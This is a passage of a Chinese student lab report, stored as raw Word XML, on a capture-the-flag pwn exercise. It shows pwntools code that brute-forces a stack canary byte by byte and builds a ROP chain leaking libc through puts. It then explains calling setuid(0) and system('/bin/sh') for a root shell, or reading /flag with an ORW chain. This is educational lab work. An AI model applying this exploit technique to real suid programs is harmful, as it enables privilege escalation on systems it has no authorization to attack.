      </w:r>
    </w:p>
    <w:p w14:paraId="2383FE4F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stack_canary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range(0x100):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BCF2A02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tmp_payload = payload0 + stack_canary.to_bytes(1, byteorder=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"little"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 w14:paraId="5B8E6AC6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proc.sendafter(b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"Input something to pwn me :)\n"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tmp_payload)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB4BDAB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line = proc.recvline()  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1131B57E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(line == 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"have fun\n"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):  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC71989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# 猜中了一位，继续下一位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661AF4C9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"{} byte : {}"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.format(i, hex(stack_canary)))  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17584B65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payload0 += stack_canary.to_bytes(1, byteorder=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"little"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 w14:paraId="21C083A4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3A2A8348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34C9CECE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(payload0)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08ABE5C8">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>爆破结果如图</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="705EC3CC">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5182235" cy="1090930"/>
            <wp:effectExtent l="9525" t="9525" r="27940" b="234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1090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43CD6C">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-4 stack canary爆破</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C27DC13">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:ind w:left="425" w:leftChars="0" w:hanging="425" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ROP编写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E84662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爆破得到stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后，payload的指定位置附带</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>stack_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，即可绕过stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_canary</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>检查，实现payload溢出覆盖返回地址，执行任意位置代码。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7972C4C3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为实现读取flag，需要使用ret2libc开启shell或构造ORW输出flag文件内容，在使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>ret2libc</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>前，还需要泄漏程序中libc库文件加载地址，由于程序未开启PIE保护，程序加载地址固定，程序导入表中有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数，可用于泄漏内存数据，因此可以构造ROP调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数输出与libc相关的地址，此处选择输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>的got表，输出结果为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>puts</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数的加载地址，再根据puts函数在libc中的相对偏移，即可计算得到libc加载地址。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F4A777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# 利用puts输出got表，泄漏出libc地址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25D315AB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pop_rdi_addr = 0x4013e3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# pop rdi; ret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65BBCB5E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puts_addr = 0x4010C0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7FFBBD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puts_got_addr = 0x404020  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64ED79BA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libc_puts_offset = 0x84420  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AF7F944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read_input_addr = 0x4012A2  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297EE35E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5A472B51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payload = payload0  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6612F565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payload += p64(pop_rdi_addr)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295B5755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payload += p64(puts_got_addr)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# rdi = puts_got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01BB5473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303F9EED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payload += p64(puts_addr)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# puts(puts_got)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656D7CDB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26C66114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payload += p64(read_input_addr)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F52D843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proc.sendafter(b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"Input something to pwn me :)\n"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payload)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B1590F3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data = proc.readline()[:-1]  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77ABB7E8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(data)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D4855D7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libc_base = int.from_bytes(data, byteorder=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"little"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 - libc_puts_offset  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC8BC96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kinsoku/>
        <w:wordWrap/>
        <w:overflowPunct/>
        <w:topLinePunct/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:bidi w:val="0"/>
        <w:adjustRightInd/>
        <w:snapToGrid/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="220" w:lineRule="exact"/>
        <w:ind w:left="1100" w:leftChars="0" w:right="0" w:hanging="363"/>
        <w:textAlignment w:val="auto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"libc addr :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hex(libc_base))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624D85A0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A119454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如图2-5，得到进程libc加载地址为0x7f288e1ec000，与使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>maps</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看地址相同。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FE33EC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845050" cy="1311275"/>
            <wp:effectExtent l="9525" t="9525" r="2222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1311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BBD40A">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-5 泄漏libc加载地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3AA7CC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泄漏libc地址后，通过偏移计算即可得到ROP中调用libc函数的地址和gadgets地址，使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>函数可打开shell，但由于程序使用suid提升权限，直接使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>system(“/bin/sh”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>打开shell无法获取root权限，因此在调用system前还需要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>setuid(0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提升程序权限，使system打开的shell有root权限。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DCF9069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构造ROP栈帧如图2-6所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6183EBBE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291965" cy="2896235"/>
            <wp:effectExtent l="0" t="0" r="13335" b="184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4DF7E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-6 ROP栈帧</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D3DB5C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执行exp进行测试（如图2-7所示），成功打开root权限shell，并获取实验flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A3717B">
      <w:pPr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146040" cy="1758315"/>
            <wp:effectExtent l="9525" t="9525" r="26035" b="228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6040" cy="1758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B4F546">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-7 exp测试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A90F141"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除了构造ROP开启root权限shell外，也可构造ORW直接输出flag文件内容，构造过程较为复杂，需要手工构造</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’/flag’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字符串，以及由于payload长度限制，需要将ROP分多次执行，使用ORW构造的ROP栈帧如图2-8所示（便于展示未按长度分段）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43733E20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168265" cy="2717800"/>
            <wp:effectExtent l="0" t="0" r="13335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ECB7E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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图2-8 ORW构造ROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4322400A"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使用ORW构造的ROP测试结果如图2-9所示，可不开启shell直接读取flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7859AB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125085" cy="1426210"/>
            <wp:effectExtent l="9525" t="9525" r="27940" b="1206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1426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257740">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:topLinePunct w:val="0"/>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:jc w:val="center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eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>图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2-9 ORW读取flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B39393"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 w14:paraId="49D0F8DC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F17E04C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="312"/>
        </w:tabs>
        <w:spacing w:before="328" w:after="328"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="15" w:name="_Toc164150376"/>
      <w:bookmarkStart w:id="16" w:name="_Toc1284149273"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>实验遇到的难点与问题分析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
      <w:bookmarkEnd w:id="16"/>
    </w:p>
    <w:p w14:paraId="6F71EBC1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第二次实验</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>爆破stack</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>_can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ry</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后，需要获取libc加载地址，在本地进行测试时，进程崩溃会生成完整的core dump文件，因此选择了从core dump中获取maps信息计算libc地址的方式，本地测试正常后，在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>pwn.hust.college</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>平台进行测试时发现获取libc地址失败，注意到由于用户低权限，进程崩溃并不会生成core dump，因此无法使用该方式获取进程中libc地址，选用puts函数直接输出内存信息，泄漏puts got表的方式计算得到libc。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C1350C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使用ORW方式构造ROP时，由于进程内存中并不包含</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”/flag”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字符串，因此需要使用memset手动写内存或使用memcpy进行拼凑得到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”/flag”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>字符串，相较于使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>setuid(0)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>system(“/bin/sh”)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>方式打开shell要复杂很多。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27551B69">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="312"/>
        </w:tabs>
        <w:spacing w:before="328" w:after="328"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="17" w:name="_Toc1598695639"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t>实验小结</w:t>
      </w:r>
      <w:bookmarkEnd w:id="17"/>
    </w:p>
    <w:p w14:paraId="55C98E4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:leftChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BF2497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实验中根据elf文件格式，通过分析elf文件头、段表、节表和符号表，获取elf在内存中的加载信息，实现了简单的readelf工具，并根据进程maps文件信息，分析了进程各模块在内存中的加载地址。还使用了常用的逆向分析工具IDA Pro，对可执行程序进行分析，识别程序license校验逻辑，并逆向程序逻辑，利用z3和md5爆破计算程序license，从而破解程序获得flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315AD3E4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第二次实验利用程序漏洞，使用Byte-By-Byte的方式爆破stack canary，绕过程序的栈保护机制，并利用缓冲区溢出实现任意代码执行，从而构造ROP获得root权限的shell，读取flag。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC9ACF2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两次实验中利用常用的程序分析调试工具，学习了基础的程序逆向和破解操作，学习了程序漏洞的利用，了解了软件安全领域常用的技术。</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:footerReference r:id="rId4" w:type="default"/>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="1985" w:right="1418" w:bottom="1701" w:left="1418" w:header="851" w:footer="992" w:gutter="0"/>
      <w:pgNumType w:start="1" w:chapSep="period"/>
      <w:cols w:space="425" w:num="1"/>
      <w:docGrid w:type="linesAndChars" w:linePitch="328" w:charSpace="-27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8E6188">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>I</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19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47920E">
    <w:pPr>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:instrText xml:space="preserve"> PAGE </w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>I</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rStyle w:val="19"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18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F5277C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B8F5277C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1">
    <w:nsid w:val="EF22EB69"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EF22EB69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2">
    <w:nsid w:val="EFF0E393"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EFF0E393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3">
    <w:nsid w:val="FDDE1596"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FDDE159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FDF462FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDF462FC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5">
    <w:nsid w:val="FFBB4D7A"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFBB4D7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5"/>
      <w:lvlText w:val="(%1)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="907"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="476"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:r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6"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="680"/>
        </w:tabs>
        <w:ind w:left="680" w:hanging="113"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Wingdings 2" w:hAnsi="Wingdings 2"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8">
    <w:nsid w:val="26EF69E9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="26EF69E9"/>
    <w:lvl w:ilvl="0" w:tentative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)"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1320"/>
        </w:tabs>
        <w:ind w:left="132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hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="31F65D92"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="31F65D92"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="2"/>
      <w:lvlText w:val="%1"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="567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680"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体"/>
        <w:b/>
        <w:i w:val="0"/>
        <w:sz w:val="28"/>
        <w:szCs w:val="28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680"/>
        </w:tabs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0">
    <w:nsid w:val="3CFE2340"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3CFE2340"/>
    <w:lvl w:ilvl="0" w:tentative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hint="default" w:ascii="Wingdings" w:hAnsi="Wingdings"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="11">
    <w:nsid w:val="6FF65D4F"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="6FF65D4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2">
    <w:nsid w:val="78F3A11E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="78F3A11E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13">
    <w:nsid w:val="7BD8C57F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7BD8C57F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0"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="13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nforcement="0"/>
  <w:defaultTabStop w:val="420"/>
  <w:drawingGridHorizontalSpacing w:val="227"/>
  <w:drawingGridVerticalSpacing w:val="16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ZiYzY1ZmMxYjMwZDM5ZDM1NGVlOGRjYjQ1ZGUwODQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00B175E7"/>
    <w:rsid w:val="00000469"/>
    <w:rsid w:val="00011CD2"/>
    <w:rsid w:val="0001592A"/>
    <w:rsid w:val="00024E35"/>
    <w:rsid w:val="0002757A"/>
    <w:rsid w:val="00037753"/>
    <w:rsid w:val="00045B3E"/>
    <w:rsid w:val="00052499"/>
    <w:rsid w:val="000602CB"/>
    <w:rsid w:val="00061741"/>
    <w:rsid w:val="0007350C"/>
    <w:rsid w:val="00080760"/>
    <w:rsid w:val="00081185"/>
    <w:rsid w:val="0008563A"/>
    <w:rsid w:val="0009239E"/>
    <w:rsid w:val="00093F24"/>
    <w:rsid w:val="00094017"/>
    <w:rsid w:val="000A1711"/>
    <w:rsid w:val="000A2B51"/>
    <w:rsid w:val="000A7C4D"/>
    <w:rsid w:val="000B42FE"/>
    <w:rsid w:val="000B5BD3"/>
    <w:rsid w:val="000C05AD"/>
    <w:rsid w:val="000C40F1"/>
    <w:rsid w:val="000D641E"/>
    <w:rsid w:val="000E28C6"/>
    <w:rsid w:val="000E39C5"/>
    <w:rsid w:val="000E4F80"/>
    <w:rsid w:val="000E5F97"/>
    <w:rsid w:val="000F64E2"/>
    <w:rsid w:val="00106551"/>
    <w:rsid w:val="001110FF"/>
    <w:rsid w:val="00111E68"/>
    <w:rsid w:val="00112B48"/>
    <w:rsid w:val="0011538C"/>
    <w:rsid w:val="001303A3"/>
    <w:rsid w:val="00143320"/>
    <w:rsid w:val="00143F87"/>
    <w:rsid w:val="00144F0A"/>
    <w:rsid w:val="00150C3D"/>
    <w:rsid w:val="001620BA"/>
    <w:rsid w:val="00162BA5"/>
    <w:rsid w:val="00175CF9"/>
    <w:rsid w:val="00181062"/>
    <w:rsid w:val="001852BD"/>
    <w:rsid w:val="001852F7"/>
    <w:rsid w:val="00187582"/>
    <w:rsid w:val="001935D5"/>
    <w:rsid w:val="001965CA"/>
    <w:rsid w:val="001968ED"/>
    <w:rsid w:val="001A13DA"/>
    <w:rsid w:val="001A2462"/>
    <w:rsid w:val="001A3DFF"/>
    <w:rsid w:val="001A77F8"/>
    <w:rsid w:val="001B03E5"/>
    <w:rsid w:val="001D09CA"/>
